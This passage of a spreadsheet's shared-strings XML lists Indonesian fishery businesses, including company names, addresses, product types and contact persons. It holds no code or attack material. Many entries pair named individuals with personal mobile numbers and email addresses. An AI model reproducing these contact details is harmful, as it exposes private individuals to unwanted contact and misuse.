    <t>Tegalkatimulyan</t>
  </si>
  <si>
    <t>dayahasillaut@gmail.com</t>
  </si>
  <si>
    <t>HARUN</t>
  </si>
  <si>
    <t>Jl. Plantar I No.59 H, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>harunacai86@gmail.com</t>
  </si>
  <si>
    <t>Harun</t>
  </si>
  <si>
    <t>PT. INDO PRIMA WIRATAMA</t>
  </si>
  <si>
    <t>Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Lobster Hidup, Belut Hidup, Ikan Air Tawar Hidup, Keong Hidup, Kerang Hidup, Ikan Air Tawar Segar, Tuna Segar, Udang Segar, Cephalopoda Segar, Kepiting Hidup, Ikan Pelagis Segar, Ikan Demersal Segar, Teripang Kering, Perut Ikan Kering, Ubur-Ubur Kering, Cacing Laut Kering</t>
  </si>
  <si>
    <t>JOKO SUTRISNO</t>
  </si>
  <si>
    <t>Karang Sari</t>
  </si>
  <si>
    <t>indoprimawiratama.pt@gmail.com</t>
  </si>
  <si>
    <t>CV. KARTIKA JAYA</t>
  </si>
  <si>
    <t>Pulau Siali RT 019 RW 005, Kel. Kasu, Kec. Belakang Padang, Kota Batam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>H. Kamin</t>
  </si>
  <si>
    <t>Belakang Padang</t>
  </si>
  <si>
    <t>Kasu</t>
  </si>
  <si>
    <t>cvkartikajaya12345@gmail.com</t>
  </si>
  <si>
    <t>Hasbi 08117552655</t>
  </si>
  <si>
    <t>Hasbi</t>
  </si>
  <si>
    <t>PT. MENARA BAHARI NUSANTARA</t>
  </si>
  <si>
    <t xml:space="preserve"> Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku, Ubur-ubur Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>JURWIN HASAN</t>
  </si>
  <si>
    <t>menarabaharinusantara@gmail.com</t>
  </si>
  <si>
    <t>ANGGA 085394162480</t>
  </si>
  <si>
    <t>ARDIANSYAH</t>
  </si>
  <si>
    <t>PT. MITRA LAUTAN MANDIRI</t>
  </si>
  <si>
    <t>Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Hiu Beku, Pari Beku</t>
  </si>
  <si>
    <t>SHERLY</t>
  </si>
  <si>
    <t>mitralautanm@gmail.com</t>
  </si>
  <si>
    <t>MUHAMMAD HAMKA 085394162480</t>
  </si>
  <si>
    <t>MUHAMMAD HAMKA SYAHRIR</t>
  </si>
  <si>
    <t>PT. JALADHI HITA ABADI</t>
  </si>
  <si>
    <t>Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Bandeng Beku, Udang Beku, Lobster Beku</t>
  </si>
  <si>
    <t>ANI SUSANTI</t>
  </si>
  <si>
    <t>pt.jhabadi@gmail.com</t>
  </si>
  <si>
    <t>PT. AGUNG MANDIRI LESTARI</t>
  </si>
  <si>
    <t>Jl. Raya Narogong KM 77, Kel. Cikiwul, Kec. Bantar Gebang, Kota Bekasi</t>
  </si>
  <si>
    <t>Salmon Segar</t>
  </si>
  <si>
    <t>HANDAKA SANTOSA</t>
  </si>
  <si>
    <t>Bantar Gebang</t>
  </si>
  <si>
    <t>Cikiwul</t>
  </si>
  <si>
    <t>sintia.rahayu@map.co.id</t>
  </si>
  <si>
    <t>021-80648565</t>
  </si>
  <si>
    <t>sintia &amp; 08176581004</t>
  </si>
  <si>
    <t>UTOMO HENDARTO</t>
  </si>
  <si>
    <t>PT. GRHA MINA SEJAHTERA</t>
  </si>
  <si>
    <t>Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Udang Kipas Beku, Ikan Kering, Kerang Hidup, Kepiting Hidup, Cephalopoda Segar, Ikan Demersal Segar, Lobster Segar, Lobster Beku, Kerang Beku, Cephalopoda Beku, Gelembung Ikan Kering, Teripang Kering</t>
  </si>
  <si>
    <t>JEFRI SUSILO</t>
  </si>
  <si>
    <t>Wedi</t>
  </si>
  <si>
    <t>grhaminas@gmail.com</t>
  </si>
  <si>
    <t>0857 8522 0793</t>
  </si>
  <si>
    <t>DIVYA BHARTI 0857 8522 0793</t>
  </si>
  <si>
    <t>EKO BUDI SETIAWAN</t>
  </si>
  <si>
    <t>PT. HOKI SINAR SUKSES</t>
  </si>
  <si>
    <t>Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Segar, Ikan Demersal Beku, Tuna Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Hadi Yanto</t>
  </si>
  <si>
    <t>Cipondoh</t>
  </si>
  <si>
    <t>Petir</t>
  </si>
  <si>
    <t>hssgroupid@gmail.com</t>
  </si>
  <si>
    <t>Hadi &amp; 085284088878</t>
  </si>
  <si>
    <t>CV. MAJU JAYA BERKAT SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Salmon Beku, Trout Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Ranata H Jacob</t>
  </si>
  <si>
    <t>majujayaberkatsejahtera@gmail.com</t>
  </si>
  <si>
    <t>021-56957941</t>
  </si>
  <si>
    <t>Nadi  082306360111</t>
  </si>
  <si>
    <t>Redi H Jacob</t>
  </si>
  <si>
    <t>PT. HASIL ALAM SAMUDERA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok D/6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Rahardjo</t>
  </si>
  <si>
    <t>fatarubahakim@gmail.com</t>
  </si>
  <si>
    <t>Ricky/081210864179</t>
  </si>
  <si>
    <t>KOPERASI PUSKOPAL MABESAL</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah B/37 RT 004 RW 003, Kel. Jurumudi, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Jurumudi</t>
  </si>
  <si>
    <t>leonarddandel@gmail.com</t>
  </si>
  <si>
    <t>021-87211880</t>
  </si>
  <si>
    <t>Leonard Dandel/ 081293604151</t>
  </si>
  <si>
    <t>DAVID CANDRA VIASCO SE</t>
  </si>
  <si>
    <t>Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi, Daging Kepiting Rebus Beku, Seafood Bernilai Tambah Rebus Beku, Seafood Bernilai Tambah Mentah Beku, Kepiting Kulit Lunak Beku</t>
  </si>
  <si>
    <t>crab.qa@ptbmi.com</t>
  </si>
  <si>
    <t>Budi Hartoyo / 08132</t>
  </si>
  <si>
    <t>Budi Hartoyo</t>
  </si>
  <si>
    <t>PT. JALADRI PRO SOLUSI</t>
  </si>
  <si>
    <t xml:space="preserve"> Jl. Muara Baru RT 22 RW 17 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>NUGROHO BUDI HARYADI</t>
  </si>
  <si>
    <t>jaladripro@gmail.com</t>
  </si>
  <si>
    <t>MOHAMAD ARIEF HARIANTO</t>
  </si>
  <si>
    <t>UD. MULTI SARANA NIAGA</t>
  </si>
  <si>
    <t>Jl. Pendopo No.07 RT 019 RW 004, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Beku, Asap, Lainnya</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Ikan Asap, Abon Ikan, Kerupuk Ikan, Bandeng Tanpa Duri</t>
  </si>
  <si>
    <t>An'im Falahuddin</t>
  </si>
  <si>
    <t>Sembayat</t>
  </si>
  <si>
    <t>animfalahuddin@gmail.com</t>
  </si>
  <si>
    <t>An'im Falahuddin (08561739091)</t>
  </si>
  <si>
    <t>PT. REVA INDO OVERSEAS</t>
  </si>
  <si>
    <t>Jl. Letkol Sarofi Lrg II Pasar Serdang, Kel. Serdang Jaya, Kec. Betara, Kabupaten Tanjung Jabung Barat</t>
  </si>
  <si>
    <t>Gunako Tjipto</t>
  </si>
  <si>
    <t>Betara</t>
  </si>
  <si>
    <t>Serdang Jaya</t>
  </si>
  <si>
    <t>revaindoo@gmail.com</t>
  </si>
  <si>
    <t>Monic &amp; 081514649088</t>
  </si>
  <si>
    <t>Purwoto</t>
  </si>
  <si>
    <t>CV. GOLDEN SEAFRESH</t>
  </si>
  <si>
    <t>Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku, Kerang Beku, Ikan Demersal Beku, Udang Mentah Beku</t>
  </si>
  <si>
    <t>JERY SANTOSA</t>
  </si>
  <si>
    <t>Terjun</t>
  </si>
  <si>
    <t>cv.goldenseafresh@gmail.com</t>
  </si>
  <si>
    <t>0811-632-488</t>
  </si>
  <si>
    <t>LIN TJENG / 0811-632-488</t>
  </si>
  <si>
    <t>LIN TJENG</t>
  </si>
  <si>
    <t>Penambulai, Kel. Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru</t>
  </si>
  <si>
    <t>Hiu Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Syarif Alwie Haddad</t>
  </si>
  <si>
    <t>Aru Tengah Selatan</t>
  </si>
  <si>
    <t>Warabal</t>
  </si>
  <si>
    <t>qcaru@arabikatama.com</t>
  </si>
  <si>
    <t>0868-11037102</t>
  </si>
  <si>
    <t>Susanto Tan 085197581151</t>
  </si>
  <si>
    <t>Susanto Tan</t>
  </si>
  <si>
    <t>PT. NARDEVCHEM KEMINDO</t>
  </si>
  <si>
    <t>Komplek Industri dan Pergudangan Taman Tekno Tahap 2 Sektor XI Blok J2 No.15, Kel. Setu, Kec. Setu, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Denny F.Haliem</t>
  </si>
  <si>
    <t>nardev@indo.net.id</t>
  </si>
  <si>
    <t>021-75880559</t>
  </si>
  <si>
    <t>Suratin &amp; 081282944770</t>
  </si>
  <si>
    <t>Bernand Setia Simanjutak</t>
  </si>
  <si>
    <t>PT. MITRA TIMUR RAYATAMA</t>
  </si>
  <si>
    <t>Jl. Noari Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>Yohanes Ganu Maran</t>
  </si>
  <si>
    <t>Karang Indah</t>
  </si>
  <si>
    <t>ptmitra617@gmail.com</t>
  </si>
  <si>
    <t>Yohanes Ganu Maran/ +6281288808089</t>
  </si>
  <si>
    <t>CV. SOON HO TBA</t>
  </si>
  <si>
    <t>Jl. Tanjung Berombang, Dusun V, Kel. Asahan Mati, Kec. Tanjungbalai, Kabupaten Asahan</t>
  </si>
  <si>
    <t>Kering, Beku, Fermentasi</t>
  </si>
  <si>
    <t>Udang Kering, Udang Rebus Beku, Udang Fermentasi</t>
  </si>
  <si>
    <t>Tanjungbalai</t>
  </si>
  <si>
    <t>Asahan Mati</t>
  </si>
  <si>
    <t>soon.ho@yahoo.com</t>
  </si>
  <si>
    <t>Julianty, 081260827799</t>
  </si>
  <si>
    <t>CV. SAMUDERA ARU PRATAMA</t>
  </si>
  <si>
    <t>Pergudangan Safe Lock Blok AH 5806, Kel. Pucang Anom, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku</t>
  </si>
  <si>
    <t>Marshel Tandrian</t>
  </si>
  <si>
    <t>Pucang Anom</t>
  </si>
  <si>
    <t>cvsamuderaarupratama17@gmail.com</t>
  </si>
  <si>
    <t>Antok Dwie S. dan 085230257350</t>
  </si>
  <si>
    <t>CV. BUMI INDO</t>
  </si>
  <si>
    <t>Jl. Tirta Suam No.1, Kel. Kedundung, Kec. Magersari, Kota Mojokerto</t>
  </si>
  <si>
    <t>TEGUH SOENAJI WIJAYA</t>
  </si>
  <si>
    <t>Kedundung</t>
  </si>
  <si>
    <t>wiyosa27@yahoo.co.id</t>
  </si>
  <si>
    <t>0321-399777</t>
  </si>
  <si>
    <t>WIYOSA YOGA TAMA/ HRD/ 085855969627</t>
  </si>
  <si>
    <t>TEGUH YUDHA PERMANA</t>
  </si>
  <si>
    <t>PT. LANCAR SUKSES INFINITI</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Kerang Beku, Telur Bulu Babi Beku, Kepiting Beku, Udang Beku, Telur Salmon Beku, Salmon Beku, Trout Beku, Ikan Demesal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>AGUS C. WIDJAJA</t>
  </si>
  <si>
    <t>widisiswoyo10@gmail.com</t>
  </si>
  <si>
    <t>021 22596155</t>
  </si>
  <si>
    <t>WIDI SISWOYO / 087779080779</t>
  </si>
  <si>
    <t>PT. LAUT NUSANTARA JUARA</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Tuna Segar, Cumi-Cumi Segar, Gurita Segar, Sotong Segar, Bulu Babi Segar</t>
  </si>
  <si>
    <t>NICODEMUS RICARDO JUWONO</t>
  </si>
  <si>
    <t>lautnusantarajuara@gmail.com</t>
  </si>
  <si>
    <t>UBALDUS MULYADI / 082144413250</t>
  </si>
  <si>
    <t>KELETEK AFDAL</t>
  </si>
  <si>
    <t>Jl. Syarif Hidayatullah RT 02, Kel. Tungkal II, Kec. Tungkal Ilir, Kabupaten Tanjung Jabung Barat</t>
  </si>
  <si>
    <t>Siti Mariah</t>
  </si>
  <si>
    <t>Tungkal Ilir</t>
  </si>
  <si>
    <t>Tungkal II</t>
  </si>
  <si>
    <t>afdhalyaya@gmail.com</t>
  </si>
  <si>
    <t>KOPERASI BERKAH SAMUDERA KENDARI</t>
  </si>
  <si>
    <t>Jl. Tuna Kompleks Pelabuhan Perikanan Samudera (PPS) Kendari, Kel. Puday, Kec. Poasia, Kota Kendari</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>Abdul Rauf</t>
  </si>
  <si>
    <t>Poasia</t>
  </si>
  <si>
    <t>kopberkahsamuderakendari@gmail.com</t>
  </si>
  <si>
    <t>Abdul Rauf &amp; 082195650970</t>
  </si>
  <si>
    <t>CV. MOMAR BIRU SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Poros Lasalimu, Kel. Wakoko, Kec. Pasar Wajo, Kabupaten Buton</t>
  </si>
  <si>
    <t>SUNARTI</t>
  </si>
  <si>
    <t>Pasar Wajo</t>
  </si>
  <si>
    <t>Wakoko</t>
  </si>
  <si>
    <t>cvmomarbs.wakoko@gmail.com</t>
  </si>
  <si>
    <t>Pak Jalil 082241361653 085290663330 082259894400</t>
  </si>
  <si>
    <t>TOMI</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) CABANG BACAN</t>
  </si>
  <si>
    <t>Desa Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Loin Segar</t>
  </si>
  <si>
    <t xml:space="preserve">Bacan Selatan </t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>bcprinus@yahoo.com</t>
  </si>
  <si>
    <t>Sumanto 081254775428</t>
  </si>
  <si>
    <t>Supono</t>
  </si>
  <si>
    <t>UD. PUTRA ANELA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Sawah Desa RT 3 RW 2, Kel. Kedungpedaringan, Kec. Kepanjen, Kabupaten Malang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>muhammad faisal zain</t>
  </si>
  <si>
    <t>Kepanjen</t>
  </si>
  <si>
    <t>Kedungpedaringan</t>
  </si>
  <si>
    <t>mufazain@gmail.com</t>
  </si>
  <si>
    <t>muhammad faisal zain 081331817995</t>
  </si>
  <si>
    <t>CV. LAUT BEROMBANG LESTARI</t>
  </si>
  <si>
    <t>Jl. Ahmad Yani No.27, Kel. Sei Berombang, Kec. Panai Hilir, Kabupaten Labuhan Batu</t>
  </si>
  <si>
    <t>Udang Kering, Teri Kering</t>
  </si>
  <si>
    <t>TJENG BENG KUI</t>
  </si>
  <si>
    <t>Panai Hilir</t>
  </si>
  <si>
    <t>Sei Berombang</t>
  </si>
  <si>
    <t>lautberombang@yahoo.com</t>
  </si>
  <si>
    <t>TJENG BENG KUI/085261629608</t>
  </si>
  <si>
    <t>PT. MEGA RIAU AQUATIK</t>
  </si>
  <si>
    <t>Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru</t>
  </si>
  <si>
    <t>Kerang Hidup, Kerang Beku, Siput Hidup, Siput Beku, Ikan Air Tawar Segar, Ikan Air Tawar Hidup, Ikan Air Tawar Beku, Udang Segar, Udang Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Segar, Ikan Demersal Beku, Kepiting Hidup</t>
  </si>
  <si>
    <t>ILHAM SAID</t>
  </si>
  <si>
    <t>Payung Sekaki</t>
  </si>
  <si>
    <t>Tirta Siak</t>
  </si>
  <si>
    <t>megariauaquatik.pt@gmail.com</t>
  </si>
  <si>
    <t>ILHAM SAID/083197674057</t>
  </si>
  <si>
    <t>CV. INDOTAMAS ASAHAN</t>
  </si>
  <si>
    <t>Jl. Tenggiri No.11, Kel. Bagan Asahan, Kec. Tanjung Balai, Kabupaten Asahan</t>
  </si>
  <si>
    <t>Udang Kering, Ikan Kering</t>
  </si>
  <si>
    <t>Rudy</t>
  </si>
  <si>
    <t>Bagan Asahan</t>
  </si>
  <si>
    <t>rudymedan07@gmail.com</t>
  </si>
  <si>
    <t>Rudy 0811628005</t>
  </si>
  <si>
    <t>PERUM PERIKANAN INDONESIA REMBANG</t>
  </si>
  <si>
    <t>Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Hasil Budidaya Beku, Udang Beku, Tuna Beku, Tuna Loin Beku, Fillet Ikan Beku, Kerang Beku</t>
  </si>
  <si>
    <t>Tri Warno Irianto</t>
  </si>
  <si>
    <t>Tasikagung</t>
  </si>
  <si>
    <t>perumperindo.unitrembang18@gmail.com</t>
  </si>
  <si>
    <t>Pradipta Ferry Saputra (082135860220)</t>
  </si>
  <si>
    <t>Pradipta Ferry Saputra</t>
  </si>
  <si>
    <t>CV. NAPIT NAULI</t>
  </si>
  <si>
    <t>Pelabuhan Tengkayu II, Kel. SDF Pelabuhan, Kec. Tarakan Tengah, Kota Tarakan</t>
  </si>
  <si>
    <t>Bandeng Beku, Bandeng Tanpa Duri</t>
  </si>
  <si>
    <t>RIDUAN NAPITUPULU</t>
  </si>
  <si>
    <t>SDF Pelabuhan</t>
  </si>
  <si>
    <t>dewidaww@gmail.com</t>
  </si>
  <si>
    <t>0813-5019-7152</t>
  </si>
  <si>
    <t>RIDUAN 0813-3168-5522</t>
  </si>
  <si>
    <t>ANGGUN</t>
  </si>
  <si>
    <t>Dusun Lekok Timur, Kel. Gondang, Kec. Gangga, Kabupaten Lombok Utara</t>
  </si>
  <si>
    <t>Ikan Pindang</t>
  </si>
  <si>
    <t>NURJANAH</t>
  </si>
  <si>
    <t>Gangga</t>
  </si>
  <si>
    <t>Gondang</t>
  </si>
  <si>
    <t>rinasasak@yahoo.co.id</t>
  </si>
  <si>
    <t>NURJANAH &amp; 087732525792</t>
  </si>
  <si>
    <t>PT. MOROTAI MARINE CULTURE</t>
  </si>
  <si>
    <t>Desa Ngele-ngele Besar, Kec. Morotai Selatan Barat, Kabupaten Pulau Morotai</t>
  </si>
  <si>
    <t>Sutrisno Sukendy</t>
  </si>
  <si>
    <t>Morotai Selatan Barat</t>
  </si>
  <si>
    <t>Ngele-ngele Besar</t>
  </si>
  <si>
    <t>nanangelek20@gmail.com</t>
  </si>
  <si>
    <t>Apolinaris Kassiuw &amp; 08135174181</t>
  </si>
  <si>
    <t>Apolinaris Kassiuw</t>
  </si>
  <si>
    <t>PT. BAGAN SUKSES MANDIRI</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>INDRA</t>
  </si>
  <si>
    <t>bagansukses90@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve"> I Made Darma Yasa &amp; 081338773365</t>
  </si>
  <si>
    <t>PRAMESTI MALIMA ENERGI FOKUS SEJAHTERA (PMEFS)</t>
  </si>
  <si>
    <t>Jl. Merak No.04 RT 001 RW 023, Kel. Palangka, Kec. Jekan Raya, Kota Palangka Raya</t>
  </si>
  <si>
    <t>Abon Ikan, Abon Rendang Ikan, Abon Kandas Sarai Ikan , Produk Perikanan Bernilai Tambah Beku, Pempek Ikan</t>
  </si>
  <si>
    <t>Aqiedah Wahyuni</t>
  </si>
  <si>
    <t>Jekan Raya</t>
  </si>
  <si>
    <t>Palangka</t>
  </si>
  <si>
    <t>pmefs.mefstizen@gmail.com</t>
  </si>
  <si>
    <t>Aqiedah Wahyuni, 082254565857</t>
  </si>
  <si>
    <t>PT. BIMA SAKTI INDOMARINE</t>
  </si>
  <si>
    <t>Dusun Sampangan RT 003 RW 001, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>EDI SUTRISNO</t>
  </si>
  <si>
    <t>bsimuncar@gmail.com</t>
  </si>
  <si>
    <t>DIAN PRANOTO / 085755785154</t>
  </si>
  <si>
    <t>PT. SUMBER NELAYAN INDONESIA</t>
  </si>
  <si>
    <t>Dusun V, Kel. Sei Lunang, Kec. Sei Kepayang Timur, Kabupaten Asahan</t>
  </si>
  <si>
    <t>Udang Rebon Kering, Terasi Udang Kering, Terasi Udang Basah</t>
  </si>
  <si>
    <t>JOHNSON</t>
  </si>
  <si>
    <t>Sei Kepayang Timur</t>
  </si>
  <si>
    <t>Sei Lunang</t>
  </si>
  <si>
    <t>legal@sumbernelayan.co.id</t>
  </si>
  <si>
    <t>Agfany - 081317422953</t>
  </si>
  <si>
    <t>CV. NOVIRA ABADI</t>
  </si>
  <si>
    <t>Jl. T. Nyak Makam No.04, Kel. Le Masen Kayee Adang, Kec. Syiah Kuala, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Demersal Segar, Bandeng Beku, Ikan Pelagis Beku, Tuna Loin Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Deza Kasyfi</t>
  </si>
  <si>
    <t>Syiah Kuala</t>
  </si>
  <si>
    <t>Le Masen Kayee Adang</t>
  </si>
  <si>
    <t>noviraabadi@yahoo.co.id</t>
  </si>
  <si>
    <t>Deza Kasyfi dan 08116822111</t>
  </si>
  <si>
    <t>PT. SARANA MARITIM MANDIRI</t>
  </si>
  <si>
    <t>Jl. Nangka Komplek Bukit Merah RT 002 RW 001, Kel. Harjosari, Kec. Tebing, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>Anthony Guo</t>
  </si>
  <si>
    <t>Tebing</t>
  </si>
  <si>
    <t>Harjosari</t>
  </si>
  <si>
    <t>saranamaritimmandiri@gmail.com</t>
  </si>
  <si>
    <t>Anthony &amp; 0811700502</t>
  </si>
  <si>
    <t>CV. KYRIA REZEKI</t>
  </si>
  <si>
    <t>Jl. Merpati Kampung Sidojadi, Kel. Batu IX, Kec. Tanjungpinang Timur, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang, Kerupuk Cumi-cumi, Kerupuk Kerang</t>
  </si>
  <si>
    <t>Bonak Chandra</t>
  </si>
  <si>
    <t>Tanjungpinang Timur</t>
  </si>
  <si>
    <t>Batu IX</t>
  </si>
  <si>
    <t>kerupuk_sr88@yahoo.com</t>
  </si>
  <si>
    <t>0813-6440-7788</t>
  </si>
  <si>
    <t>Bonak Chandra/ 0813- 6440-7788</t>
  </si>
  <si>
    <t>PT. SARI TUNA MAKMUR</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>katrin@saritunamakmur.com</t>
  </si>
  <si>
    <t>0438-35036</t>
  </si>
  <si>
    <t>SULMAGDALENA</t>
  </si>
  <si>
    <t>KARMIN NASSER</t>
  </si>
  <si>
    <t>BORKAT MANIAN</t>
  </si>
  <si>
    <t>Air Bungkeh, Jorong Bahagia, Kel. Panti Utara, Kec. Panti, Kabupaten Pasaman</t>
  </si>
  <si>
    <t>Abon Ikan, Nila Krispy</t>
  </si>
  <si>
    <t>Nurlan, S.Ag</t>
  </si>
  <si>
    <t>Panti</t>
  </si>
  <si>
    <t>Panti Utara</t>
  </si>
  <si>
    <t>borkatmanian@gmail.com</t>
  </si>
  <si>
    <t>Nurlan 082171850916</t>
  </si>
  <si>
    <t>PT. MULIA PERIKANAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Udang Beku</t>
  </si>
  <si>
    <t>Pariwari</t>
  </si>
  <si>
    <t>Dulanpokpok</t>
  </si>
  <si>
    <t>ptmuliap@gmail.com</t>
  </si>
  <si>
    <t>KE SENG/081267150575</t>
  </si>
  <si>
    <t>KE SENG</t>
  </si>
  <si>
    <t>PT. INDO MINA GRASIA</t>
  </si>
  <si>
    <t>Jl. Sagerat Tanjung Merah Lingkungan III, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>ANDRY THAHJADI</t>
  </si>
  <si>
    <t>pt.indominagrasia@gmail.com</t>
  </si>
  <si>
    <t>SITTI N. DARWIS</t>
  </si>
  <si>
    <t>UD. MINA CENDRAWASIH BAHARI</t>
  </si>
  <si>
    <t>ROBBI EKO DANANG SUPUTRO</t>
  </si>
  <si>
    <t>robbi.mcb89@gmail.com</t>
  </si>
  <si>
    <t>Danang 085334886555</t>
  </si>
  <si>
    <t>PT. MEDIKOS INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. Rengas No.1529 RT 021 RW 005, Kel. 20 Ilir, Kec. Ilir Timur II, Kota Palembang</t>
  </si>
  <si>
    <t>Belut Hidup</t>
  </si>
  <si>
    <t>Tyson Harmono</t>
  </si>
  <si>
    <t>Ilir Timur II</t>
  </si>
  <si>
    <t>20 Ilir</t>
  </si>
  <si>
    <t>medikosind@gmail.com</t>
  </si>
  <si>
    <t>Tyson Harmono/ 0811847171</t>
  </si>
  <si>
    <t>PT. BARUNA ABADI PERKASA</t>
  </si>
  <si>
    <t>Jl. Kusuma Bangsa No.18, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Kerang Beku</t>
  </si>
  <si>
    <t>TAN DICKY KUSNADI</t>
  </si>
  <si>
    <t>barunaabadiperkasa25@gmail.com</t>
  </si>
  <si>
    <t>HERAWATI &amp; +6285281292992, TAN DICKY K. &amp; +6287781355292</t>
  </si>
  <si>
    <t>Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering, Kulit Ikan Kering, Cacing Laut Kering, Rumput Laut Kering, Daging Kerang Kering, Sirip Hiu Kering</t>
  </si>
  <si>
    <t>Bonto Lanra</t>
  </si>
  <si>
